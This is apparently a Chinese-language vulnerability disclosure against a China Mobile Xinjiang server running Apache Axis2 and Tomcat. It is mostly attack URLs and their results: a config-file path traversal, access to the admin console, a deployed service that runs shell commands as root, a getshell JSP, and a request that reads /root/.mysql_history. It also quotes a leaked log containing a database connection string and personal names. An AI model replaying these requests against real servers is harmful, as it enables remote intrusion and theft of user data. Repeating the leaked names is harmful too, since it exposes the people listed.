中国移动通信集团新疆有限公司 技术支持
**.**.**.**:8080/
**.**.**.**:8080/axis2/services/Version?xsd=../conf/axis2.xml
**.**.**.**:8080/axis2/axis2-admin/listService
登录 axis2、
**.**.**.**:8080//axis2/services/Cat/exec?cmd=whoami
root 权限
/opt/apache-tomcat-7.0.55/webapps/axis2/WEB-INF/classes/
下面还存在文件遍历、4
**.**.**.**:8080/download/
**.**.**.**:8080/download/indextomcat.jsp
直接getshell、
**.**.**.**:8080/Group/logs/smms.log
日志泄漏信息
[jdbc:mysql**.**.**.**:3306/jttxl?useUnicode=true&characterEncoding=UTF-8]]
[2016-04-27 01:00:10,674] [DEBUG] [sql.ResultSet ] [{rset-100050} Result: [08558047627791600147, 张丽,魏爱东等]]
[2016-04-27 01:00:10,674] [DEBUG] [sql.ResultSet ] [{rset-100050} Result: [99021592896422007516, 魏国孝,王檬等]]
**.**.**.**:8080/fileser/resources/image/upload/
文件遍历信息泄漏、
**.**.**.**:8080//axis2/services/Cat/exec?cmd=cat%20%20/root/.mysql_history
linux中mysql记录、
信任连接、
ok